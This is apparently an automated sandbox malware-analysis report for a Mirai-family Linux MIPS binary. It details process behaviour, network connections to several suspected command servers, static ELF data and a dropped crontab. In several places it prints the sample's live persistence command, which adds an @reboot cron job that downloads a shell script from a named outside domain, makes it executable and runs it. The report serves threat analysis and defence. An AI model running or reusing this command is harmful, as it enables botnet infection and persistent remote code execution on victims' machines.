Edit tour

Linux Analysis Report
hmips.elf

Overview

General Information

Sample name:	hmips.elf
Analysis ID:	1557029
MD5:	70195f9dca045f4baf79fff2865f2fd5
SHA1:	0f12d55838271ee42cb53211e765e474d5885ff2
SHA256:	091021063c767ef9acf561f6d5c98ce8a2878f5722fb9ef717740030435bd6c9
Tags:	elfuser-abuse_ch
Infos:

Detection

Score:	52
Range:	0 - 100
Whitelisted:	false

Signatures

Connects to many ports of the same IP (likely port scanning)

Executes the "crontab" command typically for achieving persistence

Sample tries to persist itself using cron

Detected TCP or UDP traffic on non-standard ports

Executes commands using a shell command-line interpreter

Found strings indicative of a multi-platform dropper

Sample has stripped symbol table

Sample listens on a socket

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Uses the "uname" system call to query kernel version information (possible evasion)

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1557029
Start date and time:	2024-11-17 04:41:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	hmips.elf
Detection:	MAL
Classification:	mal52.troj.linELF@0/1@50/0

Runtime Messages

Command:	/tmp/hmips.elf
PID:	6257
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	you are now apart of hail cock botnet
Standard Error:	no crontab for root

Process Tree

system is lnxubuntu20

hmips.elf (PID: 6257, Parent: 6168, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/hmips.elf

hmips.elf New Fork (PID: 6259, Parent: 6257)

sh (PID: 6259, Parent: 6257, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"

sh New Fork (PID: 6261, Parent: 6259)

sh New Fork (PID: 6263, Parent: 6261)

crontab (PID: 6263, Parent: 6261, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 6262, Parent: 6259)

crontab (PID: 6262, Parent: 6259, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -

hmips.elf New Fork (PID: 6264, Parent: 6257)

hmips.elf New Fork (PID: 6306, Parent: 6264)

hmips.elf New Fork (PID: 6265, Parent: 6257)

cleanup

Yara Signatures

⊘No yara matches

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Source: tmp.fGfSNF.18.dr

String: @reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh

Networking

Connects to many ports of the same IP (likely port scanning)

Source: global traffic	TCP traffic: 194.58.66.244 ports 1,2,4,7,24781,8
Source: global traffic	TCP traffic: 193.233.193.45 ports 9462,1,2,3,12835,5,8
Source: global traffic	TCP traffic: 103.136.150.114 ports 1,13959,3,5,9,6429
Source: global traffic	TCP traffic: 81.29.149.178 ports 16520,0,1,3,9,10399
Source: global traffic	TCP traffic: 45.147.200.148 ports 5827,10932,2,5,7,8
Source: global traffic	TCP traffic: 45.140.168.235 ports 1,2,4,7,24781,8
Source: global traffic	TCP traffic: 89.32.41.42 ports 13185,16709,1,3,5,8,16546

Source: global traffic	TCP traffic: 192.168.2.23:50782 -> 194.58.66.244:24781
Source: global traffic	TCP traffic: 192.168.2.23:44128 -> 45.140.168.235:24781
Source: global traffic	TCP traffic: 192.168.2.23:41430 -> 194.87.30.79:21151
Source: global traffic	TCP traffic: 192.168.2.23:41860 -> 176.32.39.112:2449
Source: global traffic	TCP traffic: 192.168.2.23:48442 -> 86.107.100.80:10788
Source: global traffic	TCP traffic: 192.168.2.23:55028 -> 81.29.149.178:10399
Source: global traffic	TCP traffic: 192.168.2.23:40386 -> 45.147.200.148:5827
Source: global traffic	TCP traffic: 192.168.2.23:33076 -> 89.32.41.42:13185
Source: global traffic	TCP traffic: 192.168.2.23:47094 -> 213.182.204.57:15929
Source: global traffic	TCP traffic: 192.168.2.23:45040 -> 31.13.248.13:12125
Source: global traffic	TCP traffic: 192.168.2.23:39628 -> 103.136.150.114:13959
Source: global traffic	TCP traffic: 192.168.2.23:36162 -> 193.233.193.45:12835
Source: global traffic	TCP traffic: 192.168.2.23:54688 -> 91.149.218.232:2344
Source: global traffic	TCP traffic: 192.168.2.23:42856 -> 209.141.57.98:7266

Source: /tmp/hmips.elf (PID: 6257)

Socket: 127.0.0.1:1172

Jump to behavior

Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.66.244
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.66.244
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.66.244
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.66.244
Source: unknown	TCP traffic detected without corresponding DNS query: 45.140.168.235
Source: unknown	TCP traffic detected without corresponding DNS query: 45.140.168.235
Source: unknown	TCP traffic detected without corresponding DNS query: 45.140.168.235
Source: unknown	TCP traffic detected without corresponding DNS query: 45.140.168.235
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.66.244
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.66.244
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.66.244
Source: unknown	TCP traffic detected without corresponding DNS query: 45.140.168.235
Source: unknown	TCP traffic detected without corresponding DNS query: 45.140.168.235
Source: unknown	TCP traffic detected without corresponding DNS query: 45.140.168.235
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.87.30.79
Source: unknown	TCP traffic detected without corresponding DNS query: 194.87.30.79
Source: unknown	TCP traffic detected without corresponding DNS query: 194.87.30.79
Source: unknown	TCP traffic detected without corresponding DNS query: 194.87.30.79
Source: unknown	TCP traffic detected without corresponding DNS query: 194.87.30.79
Source: unknown	TCP traffic detected without corresponding DNS query: 194.87.30.79
Source: unknown	TCP traffic detected without corresponding DNS query: 176.32.39.112
Source: unknown	TCP traffic detected without corresponding DNS query: 176.32.39.112
Source: unknown	TCP traffic detected without corresponding DNS query: 176.32.39.112
Source: unknown	TCP traffic detected without corresponding DNS query: 176.32.39.112
Source: unknown	TCP traffic detected without corresponding DNS query: 176.32.39.112
Source: unknown	TCP traffic detected without corresponding DNS query: 176.32.39.112
Source: unknown	TCP traffic detected without corresponding DNS query: 176.32.39.112
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.100.80
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.100.80
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.100.80
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.100.80
Source: unknown	TCP traffic detected without corresponding DNS query: 81.29.149.178
Source: unknown	TCP traffic detected without corresponding DNS query: 81.29.149.178
Source: unknown	TCP traffic detected without corresponding DNS query: 81.29.149.178
Source: unknown	TCP traffic detected without corresponding DNS query: 81.29.149.178
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.100.80
Source: unknown	TCP traffic detected without corresponding DNS query: 81.29.149.178
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 45.147.200.148
Source: unknown	TCP traffic detected without corresponding DNS query: 45.147.200.148
Source: unknown	TCP traffic detected without corresponding DNS query: 45.147.200.148
Source: unknown	TCP traffic detected without corresponding DNS query: 45.147.200.148
Source: unknown	TCP traffic detected without corresponding DNS query: 45.147.200.148
Source: unknown	TCP traffic detected without corresponding DNS query: 45.147.200.148
Source: unknown	TCP traffic detected without corresponding DNS query: 89.32.41.42

Source: global traffic

DNS traffic detected: DNS query: kingstonwikkerink.dyn

Source: tmp.fGfSNF.18.dr

String found in binary or memory: http://hailcocks.ru/wget.sh;

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal52.troj.linELF@0/1@50/0

Persistence and Installation Behavior

Executes the "crontab" command typically for achieving persistence

Source: /bin/sh (PID: 6263)	Crontab executable: /usr/bin/crontab -> crontab -l			Jump to behavior
Source: /bin/sh (PID: 6262)	Crontab executable: /usr/bin/crontab -> crontab -			Jump to behavior

Sample tries to persist itself using cron

Source: /usr/bin/crontab (PID: 6262)	File: /var/spool/cron/crontabs/tmp.fGfSNF			Jump to behavior
Source: /usr/bin/crontab (PID: 6262)	File: /var/spool/cron/crontabs/root			Jump to behavior

Source: /tmp/hmips.elf (PID: 6259)

Shell command executed: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"

Jump to behavior

Source: submitted sample

Stderr: no crontab for root: exit code = 0

Source: /tmp/hmips.elf (PID: 6257)

Queries kernel information via 'uname':

Jump to behavior

Source: hmips.elf, 6257.1.00007ffc286c7000.00007ffc286e8000.rw-.sdmp, hmips.elf, 6264.1.00007ffc286c7000.00007ffc286e8000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-mips/tmp/hmips.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/hmips.elf
Source: hmips.elf, 6257.1.000055c0e349d000.000055c0e3566000.rw-.sdmp, hmips.elf, 6264.1.000055c0e349d000.000055c0e3566000.rw-.sdmp	Binary or memory string: U!/etc/qemu-binfmt/mips
Source: hmips.elf, 6257.1.000055c0e349d000.000055c0e3566000.rw-.sdmp, hmips.elf, 6264.1.000055c0e349d000.000055c0e3566000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/mips
Source: hmips.elf, 6257.1.00007ffc286c7000.00007ffc286e8000.rw-.sdmp, hmips.elf, 6264.1.00007ffc286c7000.00007ffc286e8000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mips

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Scheduled Task/Job	Direct Volume Access	OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Scripting	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	2 Application Layer Protocol	Traffic Duplication	Data Destruction

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
hmips.elf	11%	ReversingLabs	Linux.Backdoor.Mirai

Dropped Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
kingstonwikkerink.dyn	unknown	unknown	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://hailcocks.ru/wget.sh;	tmp.fGfSNF.18.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
194.58.66.244	unknown	Russian Federation	2118	RELCOM-ASRelcomGroup19022019RU	true
194.87.30.79	unknown	Russian Federation	2118	RELCOM-ASRelcomGroup19022019RU	false
213.182.204.57	unknown	Latvia	9009	M247GB	false
193.233.193.45	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	true
86.107.100.80	unknown	Romania	38995	AMG-ASRO	false
209.141.57.98	unknown	United States	53667	PONYNETUS	false
81.29.149.178	unknown	Switzerland	39616	COMUNICA_IT_SERVICESCH	true
45.147.200.148	unknown	Russian Federation	51659	ASBAXETRU	true
45.140.168.235	unknown	Russian Federation	51659	ASBAXETRU	true
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
91.149.218.232	unknown	Poland	198401	GECKONET-ASPL	false
31.13.248.13	unknown	Bulgaria	34224	NETERRA-ASBG	false
176.32.39.112	unknown	Russian Federation	51659	ASBAXETRU	false
103.136.150.114	unknown	Hong Kong	46261	QUICKPACKETUS	true
89.32.41.42	unknown	Romania	48874	HOSTMAZEHOSTMAZERO	true

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
213.182.204.57	mips.elf	Get hash	malicious	Unknown	Browse
	arm7.elf	Get hash	malicious	Unknown	Browse
	nsharm7.elf	Get hash	malicious	Unknown	Browse
	nshmips.elf	Get hash	malicious	Unknown	Browse
	harm5.elf	Get hash	malicious	Unknown	Browse
	mpsl.elf	Get hash	malicious	Unknown	Browse
	arm5.elf	Get hash	malicious	Unknown	Browse
	arm4.elf	Get hash	malicious	Unknown	Browse
	mpsl.elf	Get hash	malicious	Unknown	Browse
	arm7-20241104-0018.elf	Get hash	malicious	Unknown	Browse
209.141.57.98	arm.elf	Get hash	malicious	Unknown	Browse
209.141.57.98	harm4.elf	Get hash	malicious	Unknown	Browse
193.233.193.45	arm7.elf	Get hash	malicious	Unknown	Browse
	harm4.elf	Get hash	malicious	Unknown	Browse
	harm5.elf	Get hash	malicious	Unknown	Browse
	nshsh4.elf	Get hash	malicious	Unknown	Browse
	nsharm5.elf	Get hash	malicious	Unknown	Browse
	nsharm.elf	Get hash	malicious	Unknown	Browse
	nshppc.elf	Get hash	malicious	Unknown	Browse
	nshmips.elf	Get hash	malicious	Unknown	Browse
	arm7.elf	Get hash	malicious	Unknown	Browse
	mpsl.elf	Get hash	malicious	Unknown	Browse
81.29.149.178	arm5.elf	Get hash	malicious	Unknown	Browse
	ppc.elf	Get hash	malicious	Unknown	Browse
	harm4.elf	Get hash	malicious	Unknown	Browse
	harm5.elf	Get hash	malicious	Unknown	Browse
	nshsh4.elf	Get hash	malicious	Unknown	Browse
	nsharm7.elf	Get hash	malicious	Unknown	Browse
	nsharm.elf	Get hash	malicious	Unknown	Browse
	nshppc.elf	Get hash	malicious	Unknown	Browse
	nshmips.elf	Get hash	malicious	Unknown	Browse
	harm5.elf	Get hash	malicious	Unknown	Browse
86.107.100.80	arm5.elf	Get hash	malicious	Unknown	Browse
	mips.elf	Get hash	malicious	Unknown	Browse
	arm7.elf	Get hash	malicious	Unknown	Browse
	arm.elf	Get hash	malicious	Unknown	Browse
	harm4.elf	Get hash	malicious	Unknown	Browse
	harm5.elf	Get hash	malicious	Unknown	Browse
	harm4.elf	Get hash	malicious	Unknown	Browse
	nsharm7.elf	Get hash	malicious	Unknown	Browse
	nsharm5.elf	Get hash	malicious	Unknown	Browse
	nsharm.elf	Get hash	malicious	Unknown	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
M247GB	file.exe	Get hash	malicious	NetSupport RAT	Browse	45.61.128.74
	file.exe	Get hash	malicious	NetSupport RAT	Browse	45.61.128.74
	yhYrGCKq9s.exe	Get hash	malicious	RedLine	Browse	91.202.233.18
	meerkat.arm.elf	Get hash	malicious	Mirai	Browse	38.201.237.116
	botnet.x86.elf	Get hash	malicious	Mirai, Moobot	Browse	38.207.55.160
	mips.elf	Get hash	malicious	Unknown	Browse	213.182.204.57
	arm7.elf	Get hash	malicious	Unknown	Browse	213.182.204.57
	bin.sh.elf	Get hash	malicious	Mirai	Browse	45.88.100.118
	sora.mpsl.elf	Get hash	malicious	Mirai	Browse	38.206.146.185
	botnet.sh4.elf	Get hash	malicious	Mirai, Moobot	Browse	173.211.86.154
RELCOM-ASRelcomGroup19022019RU	Supply Contract 12 Additional Agreement to 76_24_.exe	Get hash	malicious	GuLoader, Remcos	Browse	194.58.83.68
	lchs.exe	Get hash	malicious	Quasar	Browse	193.124.33.141
	jKira.arm	Get hash	malicious	Mirai	Browse	195.133.54.44
RELCOM-ASRelcomGroup19022019RU	Supply Contract 12 Additional Agreement to 76_24_.exe	Get hash	malicious	GuLoader, Remcos	Browse	194.58.83.68
	lchs.exe	Get hash	malicious	Quasar	Browse	193.124.33.141
	jKira.arm	Get hash	malicious	Mirai	Browse	195.133.54.44
AMG-ASRO	arm5.elf	Get hash	malicious	Unknown	Browse	86.107.100.80
	mips.elf	Get hash	malicious	Unknown	Browse	86.107.100.80
	arm7.elf	Get hash	malicious	Unknown	Browse	86.107.100.80
	arm.elf	Get hash	malicious	Unknown	Browse	86.107.100.80
	harm4.elf	Get hash	malicious	Unknown	Browse	86.107.100.80
	harm5.elf	Get hash	malicious	Unknown	Browse	86.107.100.80
	harm4.elf	Get hash	malicious	Unknown	Browse	86.107.100.80
	nsharm7.elf	Get hash	malicious	Unknown	Browse	86.107.100.80
	nsharm5.elf	Get hash	malicious	Unknown	Browse	86.107.100.80
	nsharm.elf	Get hash	malicious	Unknown	Browse	86.107.100.80
FREE-NET-ASFREEnetEU	file.exe	Get hash	malicious	DanaBot	Browse	193.233.232.101
	xd.spc.elf	Get hash	malicious	Mirai	Browse	193.233.234.114
	RECIBO TRANSFERENCIA#0000078.exe	Get hash	malicious	Unknown	Browse	193.233.203.63
	RECIBO TRANSFERENCIA#0000078.exe	Get hash	malicious	Unknown	Browse	193.233.203.63
	n7ZKbApaa3.dll	Get hash	malicious	LummaC, Xmrig	Browse	147.45.47.81
	nlJ2sNaZVi.exe	Get hash	malicious	LummaC	Browse	147.45.44.131
	file.exe	Get hash	malicious	Clipboard Hijacker	Browse	147.45.47.61
	file.exe	Get hash	malicious	Clipboard Hijacker	Browse	147.45.47.61
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	147.45.47.61
	file.exe	Get hash	malicious	Unknown	Browse	147.45.47.61

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

/var/spool/cron/crontabs/tmp.fGfSNF

Download File

Process:	/usr/bin/crontab
File Type:	ASCII text
Category:	dropped
Size (bytes):	306
Entropy (8bit):	5.174479587848761
Encrypted:	false
SSDEEP:	6:SUrpqoqQjEOP1KmREJOBFQZBMvZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jndFKXsV:8QjHig8ZBMJeHLUHYC+GABjnOGAFkz
MD5:	C0CBF5281A31751CDD45B5F785DDD5FC
SHA1:	F68B62232EA5CEC68E95D0FF10029F479731F8B3
SHA-256:	9F01AF064F2136A983E561A874CBFBC089B16D9825FA69E600D9A76FD6FDFDB8
SHA-512:	EC49E7C8A50CBF91B222FD79B169FE10B2959BA956102E7EA61E7B79120DE332DB267B6DEECCD043D6FA59CFF4EDAB777FB4B447D5E7C4346BB3825E8C71A3F9
Malicious:	true
Reputation:	low
Preview:	# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Sat Nov 16 21:41:53 2024).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh.

Static File Info

General

File type:	ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
Entropy (8bit):	5.3627303167032725
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	hmips.elf
File size:	76'996 bytes
MD5:	70195f9dca045f4baf79fff2865f2fd5
SHA1:	0f12d55838271ee42cb53211e765e474d5885ff2
SHA256:	091021063c767ef9acf561f6d5c98ce8a2878f5722fb9ef717740030435bd6c9
SHA512:	6b758068681732a61329bc39b9b59d2ec530bb1dbe581ac81e70e9329785a0b911ed40b9eeaec05f27b69136c967f8d21ef12489bd0b0c1c957af4caadc75819
SSDEEP:	1536:/j0M+bXeCoMdsJ/KJ/tW/6LC6Z2RXG4YB1eyKWL18hE:IMoMMde6Z2RWFBl8hE
TLSH:	8373C84E6E318FEDF66C833447B74A31A75923D523E19685E2ACD2102F7024E585FFA8
File Content Preview:	.ELF.....................@.`...4..*......4. ...(.............@...@........................ ..E ..E ....0..[.........dt.Q............................<...'..L...!'.......................<...'..(...!... ....'9... ......................<...'......!........'9.

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, big endian
Version:	1 (current)
Machine:	MIPS R3000
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x400260
Flags:	0x1007
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	76436
Section Header Size:	40
Number of Section Headers:	14
Header String Table Index:	13

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x400094	0x94	0x8c	0x0	0x6	AX	4
.text	PROGBITS	0x400120	0x120	0xfc40	0x0	0x6	AX	16
.fini	PROGBITS	0x40fd60	0xfd60	0x5c	0x0	0x6	AX	4
.rodata	PROGBITS	0x40fdc0	0xfdc0	0x1a00	0x0	0x2	A	16
.ctors	PROGBITS	0x452000	0x12000	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x452008	0x12008	0x8	0x0	0x3	WA	4
.data.rel.ro	PROGBITS	0x452014	0x12014	0x4	0x0	0x3	WA	4
.data	PROGBITS	0x452020	0x12020	0x3c8	0x0	0x3	WA	16
.got	PROGBITS	0x4523f0	0x123f0	0x640	0x4	0x10000003	WAp	16
.sbss	NOBITS	0x452a30	0x12a30	0x2c	0x0	0x10000003	WAp	4
.bss	NOBITS	0x452a60	0x12a30	0x5138	0x0	0x3	WA	16
.mdebug.abi32	PROGBITS	0xcde	0x12a30	0x0	0x0	0x0		1
.shstrtab	STRTAB	0x0	0x12a30	0x64	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x400000	0x400000	0x117c0	0x117c0	5.5181	0x5	R E	0x10000	.init .text .fini .rodata
LOAD	0x12000	0x452000	0x452000	0xa30	0x5b98	3.4575	0x6	RW	0x10000	.ctors .dtors .data.rel.ro .data .got .sbss .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 17, 2024 04:41:52.480710030 CET	43928	443	192.168.2.23	91.189.91.42
Nov 17, 2024 04:41:54.917974949 CET	50782	24781	192.168.2.23	194.58.66.244
Nov 17, 2024 04:41:54.923032045 CET	24781	50782	194.58.66.244	192.168.2.23
Nov 17, 2024 04:41:54.923281908 CET	50782	24781	192.168.2.23	194.58.66.244
Nov 17, 2024 04:41:54.923281908 CET	50782	24781	192.168.2.23	194.58.66.244
Nov 17, 2024 04:41:54.928180933 CET	24781	50782	194.58.66.244	192.168.2.23
Nov 17, 2024 04:41:54.928246975 CET	50782	24781	192.168.2.23	194.58.66.244
Nov 17, 2024 04:41:54.933146954 CET	24781	50782	194.58.66.244	192.168.2.23
Nov 17, 2024 04:41:55.035797119 CET	44128	24781	192.168.2.23	45.140.168.235
Nov 17, 2024 04:41:55.040750027 CET	24781	44128	45.140.168.235	192.168.2.23
Nov 17, 2024 04:41:55.041357040 CET	44128	24781	192.168.2.23	45.140.168.235
Nov 17, 2024 04:41:55.041357040 CET	44128	24781	192.168.2.23	45.140.168.235
Nov 17, 2024 04:41:55.046212912 CET	24781	44128	45.140.168.235	192.168.2.23
Nov 17, 2024 04:41:55.046331882 CET	44128	24781	192.168.2.23	45.140.168.235
Nov 17, 2024 04:41:55.051166058 CET	24781	44128	45.140.168.235	192.168.2.23
Nov 17, 2024 04:41:55.871092081 CET	24781	50782	194.58.66.244	192.168.2.23
Nov 17, 2024 04:41:55.871143103 CET	24781	50782	194.58.66.244	192.168.2.23
Nov 17, 2024 04:41:55.871473074 CET	50782	24781	192.168.2.23	194.58.66.244
Nov 17, 2024 04:41:55.871474028 CET	50782	24781	192.168.2.23	194.58.66.244
Nov 17, 2024 04:41:55.871474028 CET	50782	24781	192.168.2.23	194.58.66.244
Nov 17, 2024 04:41:57.241957903 CET	24781	44128	45.140.168.235	192.168.2.23
Nov 17, 2024 04:41:57.241983891 CET	24781	44128	45.140.168.235	192.168.2.23
Nov 17, 2024 04:41:57.242104053 CET	44128	24781	192.168.2.23	45.140.168.235
Nov 17, 2024 04:41:57.242104053 CET	44128	24781	192.168.2.23	45.140.168.235
Nov 17, 2024 04:41:57.242381096 CET	44128	24781	192.168.2.23	45.140.168.235
Nov 17, 2024 04:41:58.111892939 CET	42836	443	192.168.2.23	91.189.91.43
Nov 17, 2024 04:41:59.391736984 CET	42516	80	192.168.2.23	109.202.202.202
Nov 17, 2024 04:42:00.921154022 CET	41430	21151	192.168.2.23	194.87.30.79
Nov 17, 2024 04:42:00.926302910 CET	21151	41430	194.87.30.79	192.168.2.23
Nov 17, 2024 04:42:00.926363945 CET	41430	21151	192.168.2.23	194.87.30.79
Nov 17, 2024 04:42:00.926407099 CET	41430	21151	192.168.2.23	194.87.30.79
Nov 17, 2024 04:42:00.931408882 CET	21151	41430	194.87.30.79	192.168.2.23
Nov 17, 2024 04:42:00.931461096 CET	41430	21151	192.168.2.23	194.87.30.79
Nov 17, 2024 04:42:00.936482906 CET	21151	41430	194.87.30.79	192.168.2.23
Nov 17, 2024 04:42:01.877898932 CET	21151	41430	194.87.30.79	192.168.2.23
Nov 17, 2024 04:42:01.877988100 CET	41430	21151	192.168.2.23	194.87.30.79
Nov 17, 2024 04:42:01.878093958 CET	41430	21151	192.168.2.23	194.87.30.79
Nov 17, 2024 04:42:02.291441917 CET	41860	2449	192.168.2.23	176.32.39.112
Nov 17, 2024 04:42:02.296536922 CET	2449	41860	176.32.39.112	192.168.2.23
Nov 17, 2024 04:42:02.296608925 CET	41860	2449	192.168.2.23	176.32.39.112
Nov 17, 2024 04:42:02.296628952 CET	41860	2449	192.168.2.23	176.32.39.112
Nov 17, 2024 04:42:02.301510096 CET	2449	41860	176.32.39.112	192.168.2.23
Nov 17, 2024 04:42:02.301569939 CET	41860	2449	192.168.2.23	176.32.39.112
Nov 17, 2024 04:42:02.306464911 CET	2449	41860	176.32.39.112	192.168.2.23
Nov 17, 2024 04:42:03.325992107 CET	2449	41860	176.32.39.112	192.168.2.23
Nov 17, 2024 04:42:03.326018095 CET	2449	41860	176.32.39.112	192.168.2.23
Nov 17, 2024 04:42:03.326236963 CET	41860	2449	192.168.2.23	176.32.39.112
Nov 17, 2024 04:42:03.326237917 CET	41860	2449	192.168.2.23	176.32.39.112
Nov 17, 2024 04:42:03.326288939 CET	41860	2449	192.168.2.23	176.32.39.112
Nov 17, 2024 04:42:06.921365976 CET	48442	10788	192.168.2.23	86.107.100.80
Nov 17, 2024 04:42:06.927356005 CET	10788	48442	86.107.100.80	192.168.2.23
Nov 17, 2024 04:42:06.927445889 CET	48442	10788	192.168.2.23	86.107.100.80
Nov 17, 2024 04:42:06.927522898 CET	48442	10788	192.168.2.23	86.107.100.80
Nov 17, 2024 04:42:06.933465958 CET	10788	48442	86.107.100.80	192.168.2.23
Nov 17, 2024 04:42:06.933532953 CET	48442	10788	192.168.2.23	86.107.100.80
Nov 17, 2024 04:42:06.939404964 CET	10788	48442	86.107.100.80	192.168.2.23
Nov 17, 2024 04:42:08.368665934 CET	55028	10399	192.168.2.23	81.29.149.178
Nov 17, 2024 04:42:08.373619080 CET	10399	55028	81.29.149.178	192.168.2.23
Nov 17, 2024 04:42:08.373709917 CET	55028	10399	192.168.2.23	81.29.149.178
Nov 17, 2024 04:42:08.373728991 CET	55028	10399	192.168.2.23	81.29.149.178
